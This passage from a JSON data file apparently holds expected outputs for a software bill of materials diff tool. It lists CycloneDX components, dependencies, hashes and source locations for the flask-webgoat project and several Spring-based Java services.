"application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": 
["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": [], "ref": "pkg:pypi/itsdangerous@1.1.0"}, {"dependsOn": [], "ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false, "endpoints": ["/create_user"], "name": "users-service"}], "specVersion": "1.5", "version": 2}, "result_11": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", 
"pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_12": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": 
"flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": 
"SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_2": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", 
"name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.8.9?type=jar", "scope": "required", "version": "2.8.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_3": {"diff_summary": {"bom_1.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.2", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.2", "version": "1.1.2"}]}}, "bom_2.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.0", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.0", "version": "1.1.0"}]}}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/werkzeug@1.0.1", "type": "library", "name": "Werkzeug", "purl": "pkg:pypi/werkzeug@1.0.1", "version": "1.0.1"}], "applications": [{"bom-ref": "pkg:github/actions/checkout@v2", 
"type": "application", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "version": "v2"}]}}}, "result_4": {"diff_summary": {"test/sbom-java.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/antlr/antlr@2.7.7?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\antlr\\antlr\\2.7.7\\antlr-2.7.7.jar"}]}}, "group": "antlr", "hashes": [{"alg": "SHA-384", "content": "2e811e531ce30a2a905d093a00de596cf04406413b60422db8252b46125cadf07b71459cf6ac6da575ec030a9bf05e57"}, {"alg": "SHA-512", "content": "311c3115f9f6651d1711c52d1739e25a70f25456cacb9a2cdde7627498c30b13d721133cc75b39462ad18812a82472ef1b3b9d64fab5abb0377c12bf82043a74"}, {"alg": "SHA3-512", "content": "3a8ce565280a157dd6e08fb68c317a4c28616099c56bc4992c38cf74a10a54a89e18e7c45190ce8511360798a87adc92f432382f9d9bdde0d56664b50044b517"}, {"alg": "SHA-1", "content": "83cd2cd674a217ade95a4bb83a8a14f351f48bd0"}, {"alg": "SHA-256", "content": "88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c"}, {"alg": "SHA3-256", "content": "babce5c8beb1d5907a7ed6354589e991da7d8d5cbd86c479abfa1e1dfc4d2eb8"}, {"alg": "SHA3-384", "content": "bdf019332ae8714ef6a3904bb42bb08c1fe4feacf5e6137274884b0377d4e5b5f7aa9fe8e1ef5ca9b3e15f12320fdb67"}, {"alg": "MD5", "content": "f8f1352c52a4c6a500b597596501fc64"}], "licenses": [{"license": {"id": "BSD-3-Clause"}}], "name": "antlr", "purl": "pkg:maven/antlr/antlr@2.7.7?type=jar", "scope": "required", "version": "2.7.7"}, {"bom-ref": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, 
or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\antlr-runtime\\3.4\\antlr-runtime-3.4.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "MD5", "content": "0e0318be407e51fdf7ba6777eabfdf73"}, {"alg": "SHA3-512", "content": "13d1f73c44e807b36946c21cfd506e91e8cbdf685b770cbc0dcb4e55ec28b5bc91bd90eb7f24ebfd13386a47eccf552dd2a1ab277fccabafdb7a9b40aa9d4fc5"}, {"alg": "SHA-512", "content": "1786aff2df4664483adcb319e64be7b69b643ac9508c3f11796b5aa45b9072b46f53f0a21b2ff7291162afe81506de16161746273e4532ebad75adbd81203f0d"}, {"alg": "SHA3-256", "content": "3f6cf631e9f792a41128400f8690266d915c0588ef85073a6cae73624a155b10"}, {"alg": "SHA-256", "content": "5b7cf53b7b30b034023f58030c8147c433f2bee0fe7dec8fae6bebf3708c5a63"}, {"alg": "SHA-384", "content": "6ee2dcd3cf8366fe6ee18fb87aebe2d162b232c89e0aab417f97fed368cdf652d27db518dc5e71aa2a4aadda2e7f4c7a"}, {"alg": "SHA-1", "content": "8f011408269a8e42b8548687e137d8eeb56df4b4"}, {"alg": "SHA3-384", "content": "db284c93203cbbec1b22b482a45c70c68e858a90e73b23fae66c1bc53231b0f61c5576fcf51ea0d3a30070428d7dd865"}], "name": "antlr-runtime", "purl": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "scope": "required", "version": "3.4"}, {"bom-ref": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "type": "framework", "description": "The Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\apache\\commons\\commons-math\\2.2\\commons-math-2.2.jar"}]}}, "group": "org.apache.commons", "hashes": [{"alg": 
"SHA-256", "content": "15993bb2a3cf50f3291b40fc980a3166a0984e7b5f1abbe5232151fd94954584"}, {"alg": "SHA-1", "content": "4877b85d388275f994a5cfc7eceb73a8045d3006"}, {"alg": "MD5", "content": "4b65633769a2d3c532c86188648bb380"}, {"alg": "SHA-384", "content": "56dde9ba9689a3efae9165010b08469108f4971542809b52facc348a841dbed76d83b5fe218ca24db6d8276f45e39458"}, {"alg": "SHA3-512", "content": "67bcc94b3d2ebf1e8d9862ad5c57609e6315e53fb27f9db16be4e1384a6619aee9e7f2d2ef530380e107d9c337cbcd4bb3a21ff4293931cb9bb488f598c63b5c"}, {"alg": "SHA3-384", "content": "7d71fdb235d8d8c4019164315b6241e893215ee3ed4934a15ccc71bae9154726e8e9ec1ab76daf0e8dec62d0069e806d"}, {"alg": "SHA3-256", "content": "d00d7bef766c466c34e0f624a1ba6ea6a2c1a0a46de81f85e331548d13b5cef0"}, {"alg": "SHA-512", "content": "f444ead8d025d92ebacc05a366cdfd6f3c9b9788f36961cc66a4c71846b9e953a586268c23268a7a8b9561159fc38f7478daea8142b3b55fb3a8dea756720ab6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-math", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "scope": "required", "version": "2.2"}, {"bom-ref": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. 
This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcprov-jdk15on\\1.56\\bcprov-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "SHA3-512", "content": "24ea4d76cc78baecafd8baeae0e201201463d920c102fe20f8dd29ff307785194dc27323215dd24680b77bbb1e65841f8150f047a3b8f007c9b04f4860b4a181"}, {"alg": "MD5", "content": "3c1bc7aaf3449308e34296546078d9f7"}, {"alg": "SHA-512", "content": "47e5f73d2b66891cf21412b807481fff4b1a844ff247ba170e7bab25a7f6303cbd5ada22e7382ba20ee344d8cc3a1909a3d255f4b24defe9357523b4a122db68"}, {"alg": "SHA-256", "content": "963e1ee14f808ffb99897d848ddcdb28fa91ddda867eb18d303e82728f878349"}, {"alg": "SHA-1", "content": "a153c6f9744a3e9dd6feab5e210e1c9861362ec7"}, {"alg": "SHA3-256", "content": "ab4e77030ace3c79f45602cf94baf81ae18305ae83037c5a37077a752cb5bfab"}, {"alg": "SHA-384", "content": "c9de4efe55d8737d5c84e7253cabe2de7b7d72180ef4c0a645ede19f627d3ebce7c0c4f19e51412b7e0a16d6c6255d32"}, {"alg": "SHA3-384", "content": "ef69f74fbf1f5416c90038f07aad6aa83e60932cf8a31400554e0380c134921ed8638528b4339edd5e8b7d1df4f62a3f"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcprov-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Spring Boot AutoConfigure", "evidence": {"callstack": {"frames": [{"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 21, "module": 
"com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 48, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 65, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 46, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 19, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 3, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"fullFilename": 
"statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "", "line": 46}, {"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 9, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-autoconfigure\\2.0.3.RELEASE\\spring-boot-autoconfigure-2.0.3.RELEASE.jar"}]}, "occurrences": [{"location": "account-service\\src\\main\\java\\com\\piggymetrics\\account\\AccountApplication.java#11"}, {"location": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\AuthApplication.java#9"}, {"location": "config\\src\\main\\java\\com\\piggymetrics\\config\\ConfigApplication.java#7"}, {"location": "gateway\\src\\main\\java\\com\\piggymetrics\\gateway\\GatewayApplication.java#8"}, {"location": "monitoring\\src\\main\\java\\com\\piggymetrics\\monitoring\\MonitoringApplication.java#7"}, {"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\NotificationServiceApplication.java#18"}, {"location": "registry\\src\\main\\java\\com\\piggymetrics\\registry\\RegistryApplication.java#7"}, {"location": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\StatisticsApplication.java#21"}, {"location": 
"turbine-stream-service\\src\\main\\java\\com\\piggymetrics\\turbine\\TurbineStreamServiceApplication.java#8"}]}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA-1", "content": "011bc4cc96b08fabad2b3186755818fa0b32d83f"}, {"alg": "MD5", "content": "0a52980d8c71d372ee9c6b100da7f49b"}, {"alg": "SHA3-384", "content": "5bfb3d163cfaaa467d760860d0c0e3825c1bccf2b62626822eb0eaa272bec13798b09b4137b109c58836c3d7566af73d"}, {"alg": "SHA-256", "content": "742df8010f51ac98a14ff19fbd6df1ef0aca7656ad475295fa90444389d2d9d4"}, {"alg": "SHA3-256", "content": "7d51c2f934ca270814c03cb35422d183a5fd16cce3b7a707047f7e1ae610b099"}, {"alg": "SHA-512", "content": "c2918394ff63ad616f64fd2900cc1c688f8772cf05a3f206d2521e2ab525bda29f6e87b18ca7ae4c4c6cd4a248032d51cc0a0d4806370166efbabc77173caac2"}, {"alg": "SHA-384", "content": "cad79a4a727581de121cc68864c456863f396e85adc7b1514bae5f874b5a50ce134ce7723c1697e297d4c61b29dcbd5c"}, {"alg": "SHA3-512", "content": "e057673f1fe4b86b0b3bd60d2feeef09549bd373cfd56e8d8a88b13272f8824b87bc8cfd02fb9739b1456ffa82567e1e99ca3cf6d5c1b7954cd0a0aa8f4d4299"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-autoconfigure", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Starter for aspect-oriented programming with Spring AOP and AspectJ", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\boot\\spring-boot-starter-aop\\2.0.3.RELEASE\\spring-boot-starter-aop-2.0.3.RELEASE.jar"}]}}, "group": "org.springframework.boot", "hashes": [{"alg": "SHA3-384", "content": 
"040f344c92763062c6fa2a6de1de4b07d4156db2e6a1b10189af28887a5dcd70a6b8eb505f953910310baaf42c9a06c1"}, {"alg": "SHA3-256", "content": "0b2ef68be5c3f07c5a385ca24cbf50cacffe25f38eb440df5bb2ea9e79d10ff3"}, {"alg": "MD5", "content": "0c857777c2044cd2ececee6b70c1cef5"}, {"alg": "SHA-512", "content": "329768326aa539dbdfda2d7eb79798deccc00948c05a6029159e25058832374789465df103da18fc88a949a08d0c439dde93b7383237106b7b92aac742f2a674"}, {"alg": "SHA-1", "content": "a78c7bc25fd51b217f078421dc40d13ddc3b9f8f"}, {"alg": "SHA-384", "content": "c6cd2c55f39efda38caf74099d2340b02d853c47cf688d66ca8fbcdbd674b1a9725d5553899f2c0ab5c65f5f11c41f10"}, {"alg": "SHA-256", "content": "ddfc437ff26e206e74d8d2b949a978dc39a5bfdade596ab280a9d56efff2d5b1"}, {"alg": "SHA3-512", "content": "ef3aecc2f2545c8224dff5e7dec998b3a2d94c6bb6296b08cf732f8488336431cd152cc15007ddb062cff00e465d9b288205dcbace1bab3859f069748d597674"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-boot-starter-aop", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.boot/spring-boot-starter-aop@2.0.3.RELEASE?type=jar", "scope": "required", "version": "2.0.3.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "This project is a Spring configuration client.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-config-client\\2.0.0.RELEASE\\spring-cloud-config-client-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-384", "content": "15b9e5813ca5260a888248932b83b3e63cd27bf46ac5db0091718c7c6e91e5d78d7889da0b1fdbaaa12de74e0fdedc49"}, {"alg": "SHA3-256", "content": "263ebd750a961f58776b4cf085feb28381530eace5b8c75d9011eeb19a2bb98d"}, {"alg": "SHA3-512", "content": 
"3d3fd94e8f281be0c4d8059dfd199ac117afba71bbd777c412f7ec7c2937a2e0caa9f01197948f9df1ebb854e0082c7dc3881bf0b7f599607444c3d4bd3016dd"}, {"alg": "SHA3-384", "content": "48ae1e40ca060c109ce89ae48eba68bb348f05aaab6f074aec8c969b66e7b3a811e8bc6e8901c183c14085612bb01dfa"}, {"alg": "MD5", "content": "5f479b27ddaa0d47f0cc6e150ac05c33"}, {"alg": "SHA-1", "content": "7a3f4447664c61ff674c29a9b2ff0dc988dee316"}, {"alg": "SHA-256", "content": "a4c26aaa864418c008b3fb067ad3b54da9a968921db4bab47366b97bd8f8ca30"}, {"alg": "SHA-512", "content": "b545b2744f31d5cc8fd7cf89e42bf7dc1a4464d1761d28f48f7446906c6bd43ec2a696eac0ba2708723ebee36b1f6316f37972e24b76eb1a621f0f153779d4ea"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-config-client", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Core", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-netflix-core\\2.0.0.RELEASE\\spring-cloud-netflix-core-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "MD5", "content": "2070a3bc6e5b770d52cdd65858ddda07"}, {"alg": "SHA3-384", "content": "77e17180e15dca51e4f3d69ff91cc90467f772d014c7a826595b5e1892a0f57bc4b4e037a59495558fefa71764fd5993"}, {"alg": "SHA-512", "content": "7814ad392c384ba4186f164e8b663e600a90c577de54ac89b967126cfe462ce08a2f295f7e54f94db3902f49de8838c70faec413d78a2d23a339a609cadcd41c"}, {"alg": "SHA-1", "content": "796bf4e966fac782c2118396d5504e01d5bd3115"}, {"alg": "SHA-256", "content": "8651ad06e6c91fadd5bf77fba528b9a23a66fb3b57b495ea8da20def6f3b5f6e"}, 
{"alg": "SHA-384", "content": "accd2bb47510f90c7df339cca211b5bf66321df9fdd5a157ed23adc012cd1f914cd94c4174cacb3e641b748ea4275e25"}, {"alg": "SHA3-256", "content": "cb9798a3a5fdf0b1c3233f60f16e9f9ee74e4d451318fb905221ee652828dfff"}, {"alg": "SHA3-512", "content": "e3f2ef307447c7e5cb994da1ca5c3ca390971a7d6062dbdf11f53cf28fe65eb5e1df31ec38474ab4e0feb2dddbc4b519a4984e5509212b5d79906eaaebed3f78"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-netflix-core", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-core@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-netflix-eureka-client@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Netflix Eureka Client", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": 